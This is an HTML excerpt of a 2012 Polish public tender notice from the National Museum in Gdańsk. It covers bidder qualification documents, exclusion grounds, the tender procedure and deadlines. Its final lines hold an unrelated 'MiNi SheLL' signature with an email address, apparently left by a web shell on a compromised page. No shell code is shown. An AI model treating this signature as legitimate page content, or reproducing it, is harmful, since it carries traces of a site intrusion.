<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę terminu wykonania zamówienia, jeżeli pojawią się okoliczności zmuszające do przerwania prac z przyczyn niezależnych od wykonawcy (prace będą wykonywane w obiektach zabytkowych), jednakże łączna liczba dni przeznaczonych na wykonanie zadania - liczona od dnia podpisania umowy- nie ulegnie zmianie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeum.narodowe.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Narodowe w Gdańsku
 Toruńska 1 pok. 108
 80-822 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2012 godzina 11:00, miejsce: Muzeum Narodowe w Gdańsku
 Toruńska 1 pok. 108
 80-822 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com